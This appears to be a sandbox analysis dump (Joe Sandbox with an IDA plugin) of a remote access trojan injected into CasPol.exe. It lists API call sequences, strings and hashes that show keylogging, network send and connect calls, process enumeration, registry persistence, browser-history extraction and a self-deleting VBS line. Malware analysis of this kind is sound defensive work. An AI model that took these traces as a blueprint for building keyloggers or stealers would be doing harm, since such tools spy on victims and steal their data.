                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 4061214504-1276376045
                                                                              • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                              • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                              • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                              • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                              APIs
                                                                              • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                              • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                              • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateValue
                                                                              • String ID: pth_unenc$BG
                                                                              • API String ID: 1818849710-2233081382
                                                                              • Opcode ID: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                              • Opcode Fuzzy Hash: ac3e74df9ad923195b5f52d5b35913edee8cf0ee45e7d693bb7f493c4d6726f0
                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404AED
                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404AF9
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B04
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040483F,00000001), ref: 00404B0D
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                              • String ID: KeepAlive | Disabled
                                                                              • API String ID: 2993684571-305739064
                                                                              • Opcode ID: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
                                                                              • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                              • Opcode Fuzzy Hash: c920db2117b9ebb21b6f907faadff67bbda6cb2284db632f5ba91f60e6129f46
                                                                              • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                              APIs
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                              • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                              • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                              • String ID: Alarm triggered
                                                                              • API String ID: 614609389-2816303416
                                                                              • Opcode ID: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                              • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                              • Opcode Fuzzy Hash: 54f3c6ceeae148a17d597440f56be2566e943f2b94ca636d37dea44f7b336d96
                                                                              • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                              Strings
                                                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                              • API String ID: 3024135584-2418719853
                                                                              • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                              • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                              • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                              • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                              • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                              • Opcode Fuzzy Hash: 931ca513a011f1f7c066f1bbdc676d39c63792ac3d4783e94f810aa166f43fa6
                                                                              • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                              APIs
                                                                                • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                              • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                              • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                              • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                              • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                              • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                              • String ID:
                                                                              • API String ID: 3525466593-0
                                                                              • Opcode ID: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                              • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                              • Opcode Fuzzy Hash: 1d05abf86b07091e57c831db778f8ab5959c1688de593f2b3614b89206745c25
                                                                              • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                              APIs
                                                                                • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                              • String ID:
                                                                              • API String ID: 4269425633-0
                                                                              • Opcode ID: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
                                                                              • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                              • Opcode Fuzzy Hash: 0d775c34279de42def04f5e4a5f6fbb11c5f8ae86916d795950b7c30c7907390
                                                                              • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                              • Instruction ID: 1dbcf13812f0ad7c91f1b1cf961d24232ef3b5dad0ac29e3e9285c08b65e5f3f
                                                                              • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                                                              • Instruction Fuzzy Hash: 4A41D532E002049FEB24DF79C881A5EB3A5EF89718F15856EE915EB341DB35EE01CB84
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
                                                                              • __alloca_probe_16.LIBCMT ref: 0044FF58
                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
                                                                              • __freea.LIBCMT ref: 0044FFC4
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                              • String ID:
                                                                              • API String ID: 1857427562-0
                                                                              • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                              • Instruction ID: fd0d2a6e26420063bd1679c32ed8e9021f1b2be81e6a043fb7466d0fa567ef17
                                                                              • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                                                              • Instruction Fuzzy Hash: 9831FE32A0021AABEF248F65DC41EAF7BA5EB05314F05017BFC04D6290EB39DD58CBA4
                                                                              APIs
                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0044E144
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
                                                                                • Part of subcall function 00446AFF: HeapAlloc.KERNEL32(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
                                                                              • _free.LIBCMT ref: 0044E1A0
                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                              • String ID:
                                                                              • API String ID: 2278895681-0
                                                                              • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                              • Instruction ID: 38685928f53d0fdec7f9771a1fbcf5508afe04d06d5fe5a1692e2fd93afee85f
                                                                              • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                                                              • Instruction Fuzzy Hash: 8201B1726417117F73215ABB6C8CC7B6A6DEEC2BA2315013ABD04D6201DA788C0291B9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00434403,00434403,?,00445359,00446B42,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?), ref: 00446F48
                                                                              • _free.LIBCMT ref: 00446F7D
                                                                              • _free.LIBCMT ref: 00446FA4
                                                                              • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FB1
                                                                              • SetLastError.KERNEL32(00000000,?,00434403), ref: 00446FBA
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorLast$_free
                                                                              • String ID:
                                                                              • API String ID: 3170660625-0
                                                                              • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                              • Instruction ID: 6bd692df8320938abc1815071491dbd9703328d73d2f54107518a18b095bb187
                                                                              • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                                                              • Instruction Fuzzy Hash: 7401D13620C70067F61266757C85D2F266DDBC3B66727013FF958A2292EE2CCC0A452F
                                                                              APIs
                                                                              • _free.LIBCMT ref: 0044F7B5
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 0044F7C7
                                                                              • _free.LIBCMT ref: 0044F7D9
                                                                              • _free.LIBCMT ref: 0044F7EB
                                                                              • _free.LIBCMT ref: 0044F7FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                              • Instruction ID: 78b16e2cd2bc6e4547488c8f4e3d182d22cf8911186b8f77a4a783cd10448158
                                                                              • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                                                              • Instruction Fuzzy Hash: 9AF01232505600BBE620EB59E8C5C1773E9EB827147A9482BF408F7641CB3DFCC48A6C
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00443305
                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                              • _free.LIBCMT ref: 00443317
                                                                              • _free.LIBCMT ref: 0044332A
                                                                              • _free.LIBCMT ref: 0044333B
                                                                              • _free.LIBCMT ref: 0044334C
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                              • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                              • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                              • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
                                                                              APIs
                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                                                              • IsWindowVisible.USER32(?), ref: 004167A1
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessWindow$Open$TextThreadVisible
                                                                              • String ID: (FG
                                                                              • API String ID: 3142014140-2273637114
                                                                              • Opcode ID: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
                                                                              • Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
                                                                              • Opcode Fuzzy Hash: 6c16c17156e3f772358f7467e06c9b2cfcef92d79dd8da7b0064c4f82c90d24e
                                                                              • Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
                                                                              APIs
                                                                              • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                              • String ID: XCG$`AG$>G
                                                                              • API String ID: 2334542088-2372832151
                                                                              • Opcode ID: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
                                                                              • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                              • Opcode Fuzzy Hash: ce0f8d336d2a156708e4fb79cc9eb4dc9fb8683efa97e21ee82fd6c7139a85ed
                                                                              • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                              • _free.LIBCMT ref: 004427DF
                                                                              • _free.LIBCMT ref: 004427E9
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$FileModuleName
                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                              • API String ID: 2506810119-3657627342
                                                                              • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                              • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                              • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                              • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
                                                                                • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                              • Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                              • String ID: /sort "Visit Time" /stext "$8>G
                                                                              • API String ID: 368326130-2663660666
                                                                              • Opcode ID: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
                                                                              • Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
                                                                              • Opcode Fuzzy Hash: c4263464be22f02838b4d8536b2b9f3deae672e2af24e6496d28b6afc4a6d1c8
                                                                              • Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
                                                                              APIs
                                                                                • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00465900,00000000,00000000,0040C267,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041B5CE
                                                                              • ShellExecuteW.SHELL32(?,open,00000000), ref: 0040C632
                                                                              • ExitProcess.KERNEL32 ref: 0040C63E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateExecuteExitFileProcessShell
                                                                              • String ID: fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                              • API String ID: 2309964880-3562070623
                                                                              • Opcode ID: 7ccb560838e9c1dbc86872375eaf463d2dff220a3970af6a006826db3667550d
                                                                              • Instruction ID: 568fed376c07edf90cd2df9b8610832c68d616ac56d6d0e00b2c9eff25916ff3
                                                                              • Opcode Fuzzy Hash: 7ccb560838e9c1dbc86872375eaf463d2dff220a3970af6a006826db3667550d
                                                                              • Instruction Fuzzy Hash: 692145315042405AC324FB25E8969BF77E4AFD1319F50493FF482620F2EF38AA49C69A
                                                                              APIs
                                                                              • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                              • CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateThread$LocalTimewsprintf
                                                                              • String ID: Offline Keylogger Started
                                                                              • API String ID: 465354869-4114347211
                                                                              • Opcode ID: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
                                                                              • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                              • Opcode Fuzzy Hash: 37852cb36ddf9343104c0579adaedb1d6044286f869547d9c6730b709b6f6d7f
                                                                              • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                              APIs
                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
                                                                              • CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
                                                                              Strings
                                                                              Memory Dump Source
